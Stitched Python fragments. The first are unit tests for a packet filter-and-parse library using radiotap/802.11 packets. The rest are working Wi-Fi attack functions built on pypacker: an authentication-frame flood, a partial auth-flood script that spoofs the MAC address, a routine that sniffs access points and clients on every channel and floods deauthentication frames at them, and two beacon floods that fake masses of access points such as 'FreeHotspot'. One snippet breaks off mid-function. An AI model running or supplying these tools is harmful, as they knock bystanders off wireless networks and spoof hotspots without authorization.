def test_radiotap_packet_filter_and_parse_with_auto_encap_in_field_template( marine_or_marine_pool: Union[Marine, MarinePool] ): src_ip = "78.78.78.255" dst_ip = "10.0.0.255" bpf_filter = "ip" display_filter = "ip" field_templates = {"macro.dummy": ["radiotap.present.rate"]} expected_output = { "macro.dummy": 1, "ip.src": src_ip, "ip.dst": dst_ip, } packet = ( radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK) + ieee80211.IEEE80211(framectl=0x8801) + ieee80211.IEEE80211.Dataframe(sec_param=None) + llc.LLC( dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big") ) + ip.IP(src_s=src_ip, dst_s=dst_ip) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=None, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=field_templates, expected_passed=True, expected_output=expected_output, )
def test_radiotap_packet_filter_and_parse_failing_wrong_encapsulation( marine_or_marine_pool: Union[Marine, MarinePool] ): src_ip = "78.78.78.255" dst_ip = "10.0.0.255" bpf_filter = "ip" display_filter = "ip" packet = ( radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK) + ieee80211.IEEE80211(framectl=0x8801) + ieee80211.IEEE80211.Dataframe(sec_param=None) + llc.LLC( dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big") ) + ip.IP(src_s=src_ip, dst_s=dst_ip) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=bpf_filter, display_filter=display_filter, field_templates=None, expected_passed=False, expected_output={}, )
def test_radiotap_packet_filter_and_parse_parsing_wrong_encapsulation( marine_or_marine_pool: Union[Marine, MarinePool] ): src_ip = "78.78.78.255" dst_ip = "10.0.0.255" expected_output = { "radiotap.present.tsft": None, "radiotap.present.channel": None, "radiotap.present.rate": None, "wlan.fc.type_subtype": None, "llc.type": None, "ip.src": None, "ip.dst": None, } packet = ( radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK) + ieee80211.IEEE80211(framectl=0x8801) + ieee80211.IEEE80211.Dataframe(sec_param=None) + llc.LLC( dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big") ) + ip.IP(src_s=src_ip, dst_s=dst_ip) ) general_filter_and_parse_test( marine_or_marine_pool=marine_or_marine_pool, packet=packet.bin(), packet_encapsulation=encap_consts.ENCAP_ETHERNET, bpf_filter=None, display_filter=None, field_templates=None, expected_passed=True, expected_output=expected_output, )
def wifi_authdos_cb(pargs): """ Authentication frames DoS """ radiotap_ieee80211 = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst) radiotap_ieee80211_auth = radiotap_ieee80211 + auth psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) channel = int(pargs.channels.split(",")[0]) logger.debug("sending %d deauth to %r on channel %d", pargs.count, pargs.mac_dst, channel) utils.switch_wlan_channel(pargs.iface_name, int(pargs.channels.split(",")[0])) for cnt in range(pargs.count): if cnt & 15 == 0: print(".", end="") sys.stdout.flush() auth.src = pypacker.get_rnd_mac() try: psock_send.send(radiotap_ieee80211_auth.bin()) except socket.timeout: # timeout on sending? that's ok pass print("") psock_send.close()
from pypacker import psocket # name of monitor interface to use wlan_monitor_if = sys.argv[1] # MAC address of access point ap_mac = sys.argv[2] print("interface/ap: %s %s" % (wlan_monitor_if, ap_mac)) utils.set_wlan_monmode(wlan_monitor_if, monitor_active=False, reactivate=False) utils.set_ethernet_address(wlan_monitor_if, "24:77:03:01:5C:8D") utils.set_wlan_monmode(wlan_monitor_if, monitor_active=True) psocket = psocket.SocketHndl(wlan_monitor_if) auth_req_orig = radiotap.Radiotap() +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) +\ ieee80211.IEEE80211.Auth(dst_s=ap_mac, bssid_s=ap_mac) beacon_orig = radiotap.Radiotap() +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) +\ ieee80211.IEEE80211.Beacon( params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")] ) def send_auth(mac): """Send authentications to ap having mac 'mac'""" auth_req = copy.deepcopy(auth_req_orig)
def wifi_deauth_cb(pargs): """ Deauth everyone and everything """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) logger.debug("using channels: %r", channels) psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2, timeout=1) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) # {channel : {b"AP" : set(b"clients", ...)}} wdata = collections.defaultdict(lambda: collections.defaultdict(set)) # thread: socket1: listen for traffic, extract ap/client macs def listen_cycler(pargs_ref): while pargs_ref.is_running: try: rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0] except (IndexError, socket.timeout, OSError): logger.debug("no packets received..") continue try: pkt_ieee80211 = rtap.ieee80211 except Exception as ex: logger.warning(ex) # TODO: use channel info from radiotap? if pkt_ieee80211.is_beacon(): bssid = pkt_ieee80211.beacon.bssid if bssid in pargs.macs_excluded: #logger.debug("excluding AP: %r", bssid) continue # don't overwrite already stored client MACs if bssid not in wdata[pargs.current_channel]: # logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid)) wdata[pargs.current_channel][bssid] = set() for client in pkt_ieee80211.extract_client_macs(): bssid = pkt_ieee80211.upper_layer.bssid if bssid in pargs.macs_excluded: #logger.debug("excluding AP: %r", bssid) continue if client in pargs.macs_excluded or\ client in wdata[pargs.current_channel][bssid]: #logger.debug("excluding client: %r", bssid) continue # logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client)) wdata[pargs.current_channel][bssid].add(client) pargs.is_running = True pargs.current_channel = channels[0] layer_radiotap = radiotap.Radiotap() layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_DEAUTH) layer_deauth = ieee80211.IEEE80211.Deauth() pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth thread_listen = threading.Thread(target=listen_cycler, args=[pargs]) thread_listen.start() logger.info("first round slow start..") for cnt in range(pargs.count): seq = 0 layer_deauth.seq = seq if not pargs.is_running: break for channel in channels: # skip non-traffic channels if cnt > 0 and len(wdata[channel]) == 0: #logger.debug("skipping channel %d", channel) continue utils.switch_wlan_channel(pargs.iface_name, channel) pargs.current_channel = channel try: time.sleep(0.4 if cnt == 0 else 0.05) except KeyboardInterrupt: pargs.is_running = False break logger.info( "deauth on channel %3d (%3d APs, %3d clients, round %4d)", channel, len(wdata[channel]), sum(len(clients) for ap, clients in wdata[channel].items()), cnt) # TODO: quite slow aps = list(wdata[channel].keys()) for mac_ap, macs_clients in [[ap, wdata[channel][ap]] for ap in aps]: layer_deauth.seq += 1 layer_deauth.src = mac_ap layer_deauth.bssid = mac_ap if not pargs.nobroadcast: # reset src/dst for broadcast layer_deauth.dst = b"\xFF" * 6 # TODO: increase? # logger.debug("deauth AP: %r", mac_ap) for _ in range(5): layer_deauth.seq += 1 psock_send.send(pkt_deauth.bin()) for mac_client in list(macs_clients): # logger.debug("deauth client: %r", mac_client) layer_deauth.dst = mac_client for _ in range(2): layer_deauth.seq += 1 psock_send.send(pkt_deauth.bin()) psock_send.close() psock_rcv.close()
def wifi_ap_ie_cb(pargs): """ Create fake APs using various IEs """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) beacon_orig = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \ ieee80211.IEEE80211.Beacon( dst=b"\xFF\xFF\xFF\xFF\xFF\xFF", src=b"\xFF\xFF\xFF\xFF\xFF\xFF", params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"), ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16), ] ) beacon = copy.deepcopy(beacon_orig) _beacon = beacon[ieee80211.IEEE80211.Beacon] mac = pypacker.get_rnd_mac() essid = "012" _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = bytes(essid, "ascii") _beacon.params[0].len = len(essid) _beacon.params[2].body_bytes = pack_B(channels[0]) _beacon.seq = 0 # adaptive sleeptime due to full buffer on fast sending sleeptime = 0.000001 pargs.is_running = True logger.info("faking APs on the following channels %r", channels) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) ie_cnt = 0 pkt_cnt = 0 PACKETS_PER_CHANNEL = 3 for _ in range(pargs.count): if not pargs.is_running: break for channel in channels: if pkt_cnt % (256) == 0: print("%d packets sent, ch: %d \r" % (pkt_cnt, channel), end="") sys.stdout.flush() _beacon.params[2].body_bytes = pack_B(channel) utils.switch_wlan_channel(pargs.iface_name, channel) #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes) pkt_cnt += 256 try: for ie_id in range(256): _beacon.params[5].id = ie_id mac = pypacker.get_rnd_mac() _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = get_random_essid() _beacon.params[0].len = len(_beacon.params[0].body_bytes) for _ in range(PACKETS_PER_CHANNEL): _beacon.seq = ie_id # _beacon.ts = x << (8*7) _beacon.ts = ie_id * 20 # time.sleep(0.01) psock_send.send(beacon.bin()) time.sleep(sleeptime) except socket.timeout: # timeout on sending? that's ok pass except OSError: sleeptime *= 10 print() logger.warning( "buffer full, new sleeptime: %03.6fs, waiting...", sleeptime) time.sleep(1) ie_cnt = (ie_cnt + 1) & 0xFF psock_send.close()
def wifi_ap_cb(pargs): """ Create a massive amount of fake APs """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) beacon_orig = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \ ieee80211.IEEE80211.Beacon( dst=b"\xFF\xFF\xFF\xFF\xFF\xFF", src=b"\xFF\xFF\xFF\xFF\xFF\xFF", params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")]) beacon = copy.deepcopy(beacon_orig) _beacon = beacon[ieee80211.IEEE80211.Beacon] mac = pypacker.get_rnd_mac() essid = "FreeHotspot" _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = bytes(essid, "ascii") _beacon.params[0].len = len(essid) _beacon.params[2].body_bytes = pack_B(channels[0]) _beacon.seq = 0 _beacon.interval = 0xFFFF # adaptive sleeptime due to full buffer on fast sending sleeptime = 0.000001 rand_mac = True rand_essid = True pargs.is_running = True logger.info("faking APs on the following channels %r", channels) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) cnt = 0 rounds = 0 PACKETS_PER_CHANNEL = 3 starttime = time.time() _beacon.params[2].body_bytes = pack_B(channels[0]) utils.switch_wlan_channel(pargs.iface_name, channels[0]) for _ in range(pargs.count): if not pargs.is_running: break if cnt & 0xF == 0: print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="") sys.stdout.flush() if time.time() - starttime > 60: rounds += 1 cnt = 0 cnt_bts = unpack_I(cnt)[0][-3:] cnt += 1 if rand_mac: mac = pypacker.get_rnd_mac()[:3] + cnt_bts _beacon.src = mac _beacon.bssid = mac if rand_essid: _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts _beacon.params[0].len = len(_beacon.params[0].body_bytes) try: _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL for cnt_ap in range(PACKETS_PER_CHANNEL): # send multiple beacons for every ap psock_send.send(beacon.bin()) _beacon.seq += 1 _beacon.ts += 0x100 #time.sleep(sleeptime) except socket.timeout: # timeout on sending? that's ok pass except OSError: sleeptime *= 10 print() logger.warning("buffer full, new sleeptime: %03.6fs, waiting...", sleeptime) time.sleep(1) psock_send.close()